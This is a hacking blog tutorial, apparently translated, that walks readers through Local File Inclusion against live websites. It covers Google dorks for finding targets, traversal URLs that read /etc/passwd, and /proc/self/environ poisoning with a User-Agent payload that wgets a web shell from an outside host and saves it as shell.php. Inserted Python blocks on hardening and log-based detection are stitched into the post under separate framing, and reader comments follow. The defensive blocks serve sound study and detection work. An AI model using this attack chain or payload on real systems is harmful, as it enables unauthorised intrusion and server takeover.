Good morning everyone, here we are again. In this tutorial I want to talk about LFI (Local File Inclusion). LFI is a hacking technique we have to learn if we want to become hackers. Me, I'm just a Facebook user, so if I can't pull it off it's no sin, hehe..

Hacking a website with the LFI technique is done by injecting the URL of a vulnerable target site so that we can put malicious code into proc/self/environ. In the end we can use that injection to upload a shell onto the target site.

OK, let's just get started with the tutorial..

    1. First we google for our target using the dorks below:

      inurl:/view/lang/index.php?page=?page=
      inurl:/shared/help.php?page=
      inurl:act=
      inurl:action=
      inurl:API_HOME_DIR=
      inurl:board=
      inurl:cat=
      inurl:client_id=
      inurl:cmd=
      inurl:cont=
      inurl:current_frame=
      inurl:date=
      inurl:detail=
      inurl:dir=
      inurl:display=
      inurl:download=
      inurl:f=
      inurl:file=
      inurl:fileinclude=
      inurl:filename=
      inurl:firm_id=
      inurl:g=
      inurl:getdata=
      inurl:go=
      inurl:HT=
      inurl:idd=
      inurl:inc=
      inurl:incfile=
      inurl:incl=
      inurl:include_file=
      inurl:include_path=
      inurl:infile=
      inurl:info=
      inurl:ir=
      inurl:lang=
      inurl:language=
      inurl:link=
      inurl:load=
      inurl:main=
      inurl:mainspot=
      inurl:msg=
      inurl:num=
      inurl:openfile=
      inurl:p=
      inurl:page=
      inurl:pagina=
      inurl:path=
      inurl:path_to_calendar=
      inurl:pg=
      inurl:qry_str=
      inurl:ruta=
      inurl:safehtml=
      inurl:section=
      inurl:showfile=
      inurl:side=
      inurl:site_id=
      inurl:skin=
      inurl:static=
      inurl:str=
      inurl:strona=
      inurl:sub=
      inurl:tresc=
      inurl:url=
      inurl:user=
      inurl:ajax.php?page=

    2. I assume you've already got a target, then we start the LFI process.

      Let's say my target has the following URL:

      http://www.website.com/view.php?page=contact.php

      (Replace contact.php with ../) so the URL becomes:

      http://www.website.com/view.php?page=../

    3. If we get an error message like this:
      Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

      Then we can continue to step 4

    4. Now we inject the URL by entering the following code:

      http://www.website.com/view.php?page=../../../etc/passwd

      if there is an error message like this:

      Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

      then we raise the directory level to:

      http://www.website.com/view.php?page=../../../../../etc/passwd

      if it works, the following will appear:

      root:x:0:0:root:/root:/bin/bash
      bin:x:1:1:bin:/bin:/sbin/nologin
      daemon:x:2:2:daemon:/sbin:/sbin/nologin
      adm:x:3:4:adm:/var/adm:/sbin/nologin
      lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
      sync:x:5:0:sync:/sbin:/bin/sync
      shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
      halt:x:7:0:halt:/sbin:/sbin/halt
      mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
      news:x:9:13:news:/etc/news:
      uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
      operator:x:11:0:operator:/root:/sbin/nologin
      games:x:12:100:games:/usr/games:/sbin/nologin
      test:x:13:30:test:/var/test:/sbin/nologin
      ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
      nobody:x:99:99:Nobody:/:/sbin/nologin

    5. Now we check whether proc/self/environ can be accessed or not; to do that, we change the URL to:

      http://www.website.com/view.php?page=../../../../../proc/self/environ

      if the following appears:

      DOCUMENT_ROOT=/home/sirgod/public_html
      GATEWAY_INTERFACE=CGI/1.1
      HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
      HTTP_HOST=www.website.com
      HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
      HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
      PATH=/bin:/usr/bin
      QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
      REDIRECT_STATUS=200
      REMOTE_ADDR=6x.1xx.4x.1xx
      REMOTE_PORT=35665
      REQUEST_METHOD=GET
      REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
      SCRIPT_FILENAME=/home/sirgod/public_html/index.php
      SCRIPT_NAME=/index.php
      SERVER_ADDR=1xx.1xx.1xx.6x
      SERVER_ADMIN=webmaster@website.com
      SERVER_NAME=www.website.com
      SERVER_PORT=80
      SERVER_PROTOCOL=HTTP/1.0
      SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80

      that means we can continue ..

    6. Now we try to upload a shell by putting malicious code into the target URL. The way to do it is with the Firefox add-on Tamper Data. I've already explained how it works on this blog, so I won't explain it again. OK, first open Tamper Data, then click Start Tamper. Then open the following URL:

      http://www.website.com/view.php?page=../../../../../proc/self/environ

      In the User-Agent field in Tamper Data we enter the following code:

      <?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?>

      Then click Submit..

    7. If it worked we can see our shell at the URL:

      http://www.website.com/shell.php
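To see what is actually going wrong on the server side, and how the site owner fixes it, here is an added example that is not part of the original post. It rebuilds the path handling behind `view.php?page=...` in Python so it runs on its own, puts the same traversal used in step 4 next to a hardened resolver, and shows that the hardened one refuses it. The directory layout, the page names and the allowlist are all constructed for the demo.

```python
"""Added example, not code from the original post: the path handling behind
a `view.php?page=...` include and the fix, in Python so it runs stand-alone.
Directory names, page names and the allowlist are constructed for the demo."""
import os
import tempfile
from typing import Optional

# Constructed allowlist: the only pages view.php is ever meant to include.
ALLOWED_PAGES = {"home", "contact", "about"}


def vulnerable_resolve(pages_dir: str, page: str) -> str:
    """Mirrors include($_GET['page']): the client string is joined to the
    directory as-is, so every '../' climbs one level out of pages_dir."""
    return os.path.normpath(os.path.join(pages_dir, page))


def is_inside(base_dir: str, candidate: str) -> bool:
    """Containment check: after '..' and symlinks are resolved, the candidate
    must still sit below base_dir (and not be base_dir itself)."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(candidate)
    return os.path.commonpath([base, target]) == base and target != base


def hardened_resolve(pages_dir: str, page: str) -> Optional[str]:
    """Two independent controls: an allowlist of page names, so no client
    supplied path ever reaches include, plus the containment check as
    defence in depth for code that really must build a path."""
    if page not in ALLOWED_PAGES:
        return None
    candidate = os.path.join(pages_dir, page + ".php")
    return candidate if is_inside(pages_dir, candidate) else None


def build_sandbox() -> str:
    """Constructed stand-in for the tutorial's box: a pages directory under
    <tmp>/home/sirgod/public_html and a fake /etc/passwd outside the web root."""
    root = tempfile.mkdtemp()
    pages = os.path.join(root, "home", "sirgod", "public_html", "pages")
    os.makedirs(pages)
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(pages, "contact.php"), "w") as fh:
        fh.write("<p>contact page</p>")
    with open(os.path.join(root, "etc", "passwd"), "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
    return root


def demo() -> dict:
    """Run the traversal against both resolvers and report what each did."""
    root = build_sandbox()
    pages = os.path.join(root, "home", "sirgod", "public_html", "pages")
    # Four levels up: pages -> public_html -> sirgod -> home -> sandbox root
    traversal = "../../../../etc/passwd"
    leaked_path = vulnerable_resolve(pages, traversal)
    with open(leaked_path) as fh:
        leaked_line = fh.readline().strip()
    return {
        "vulnerable_path": leaked_path,
        "vulnerable_leak": leaked_line,
        "hardened_traversal": hardened_resolve(pages, traversal),
        "hardened_contact": hardened_resolve(pages, "contact"),
        "contained": is_inside(pages, os.path.join(pages, traversal)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The allowlist alone breaks the whole chain, because steps 2 to 7 all depend on `page` being handed to `include` unchecked; the containment check is for code that genuinely has to build a path from user input. In PHP the same idea is `in_array($page, $allowed, true)` before the `include`, and setting `open_basedir` in php.ini limits what `include()` can open even if a check is missed.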

OK then, good luck everyone🙂
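From the other side of the fence: every request in steps 4 to 6 leaves a trace in the web server's access log, and the User-Agent trick in step 6 is visible there as well, because the same header that ends up in /proc/self/environ is also logged. Here is an added example, not from the original post, that scans Apache combined-format log lines for those traces; the log lines, IP addresses and timestamps are constructed for the demo.

```python
"""Added example, not from the original post: flag the traces an LFI /
environ-poisoning attempt leaves in Apache combined-format access logs.
All log lines below are constructed sample data."""
import re
from urllib.parse import unquote

# Stock Apache "combined" LogFormat:
# host ident user [time] "method uri proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: one normal page view, the /etc/passwd read from step 4,
# the environ read with a PHP tag in the User-Agent (step 6), and one more
# ordinary request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2012:13:55:36 +0700] "GET /view.php?page=contact.php HTTP/1.1" 200 1534 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2012:13:56:01 +0700] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1802 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2012:13:56:40 +0700] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "<?php echo(\'probe\'); ?>"',
    '198.51.100.7 - - [10/Oct/2012:14:01:12 +0700] "GET /index.php?view=home HTTP/1.1" 200 900 "http://www.website.com/" "Opera/9.80"',
]


def parse_line(line: str):
    """Return the named fields of one combined-format line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode(value: str) -> str:
    """Decode twice so ..%2F and the double-encoded ..%252F both become ../"""
    return unquote(unquote(value)).lower()


def classify(entry: dict) -> list:
    """List the reasons one request looks like the tutorial's LFI chain."""
    reasons = []
    uri = decode(entry["uri"])
    if "../" in uri or "..\\" in uri:
        reasons.append("path traversal in query")
    if "/proc/self/environ" in uri:
        reasons.append("read of /proc/self/environ (setup for environ poisoning)")
    if "/etc/passwd" in uri:
        reasons.append("attempt to read /etc/passwd")
    ua = decode(entry["ua"])
    if "<?" in ua:
        reasons.append("php tag in User-Agent (code injected via environ)")
    return reasons


def scan(lines) -> list:
    """Parse every line and keep the ones that trip at least one rule."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # not combined format, skip rather than guess
        reasons = classify(entry)
        if reasons:
            findings.append({"ip": entry["ip"], "uri": entry["uri"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["uri"], "->", "; ".join(hit["reasons"]))
```

The regex follows the stock Apache `combined` LogFormat, and the double `unquote` is there so that `..%2F` and the double-encoded `..%252F` are both seen as `../`. A User-Agent that contains a literal `"` is written escaped by Apache and would need the pattern extended; that case is left out here.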

Comments
  1. nn_kript says:

    oh I see, ok I'll give it a try first

  2. Amazing things here. I am very happy to look your post. Thanks so much and I am taking a look forward to contact you. Will you please drop me a mail?

  3. I am no longer sure the place you are getting your information, but great topic. I must spend a while learning more or understanding more. Thank you for great information I was on the lookout for this info for my mission.

  4. hime-sama says:

    I'll study it first bro, I'm a newbie after all, haha..

  5. kharek.com says:

    Appreciate this post. Will try it out.

  6. masaku11 says:

    bro, what if the site URL has already been shortened to “tes.com/bla-bla.html”

  7. Agpra says:

    bro, I used those dorks and didn't get anything… can you help? please teach me

  8. It’s really a great and helpful piece of info. I’m happy that you just shared this
    useful info with us. Please keep us up to date like this. Thanks for sharing.

Please comment if anything is unclear
